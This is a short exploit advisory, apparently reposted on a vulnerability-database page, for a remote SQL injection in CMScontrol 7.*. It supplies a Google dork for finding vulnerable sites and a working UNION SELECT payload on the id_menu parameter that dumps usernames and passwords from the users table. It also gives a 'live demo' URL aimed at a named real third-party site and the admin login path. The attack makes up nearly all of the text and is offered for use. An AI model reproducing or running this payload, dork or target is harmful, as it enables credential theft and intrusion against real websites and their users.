#=Info=======================================================================# # Software: CMScontrol (Content Management Portal Solutions) Sql Injection # # Version: 7.* # # Vulnerability: Remote Sql Injection # # Google Dork: "index.php?id_menu=" CMScontrol # # Off. site: www.cmscontrol.com # #============================================================================# #=Author==============================================# # Author: ph1l1ster # # Date: 20.09.2009 # # Contact: icq: 612672 | email: ph1l1st3r@gmail.com # #=====================================================# #=Sql Injection===========================================================================================================================================================# # Exploit: http://site/index.php?id_menu=82+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users-- # # Live demo: http://www.galsi.it/index.php?id_menu=99999+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users-- # # Login page: http://site/admin/login.php # #==================================================================================================================================================================# #=Greetz================================# # mr.gr33n aka mr.Br0wn, easy-, Micr0b # # 0wners Team and all milw0rm team # # CW.WS and all CW team # # All Russian and other h4x0r5 # #=======================================#
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论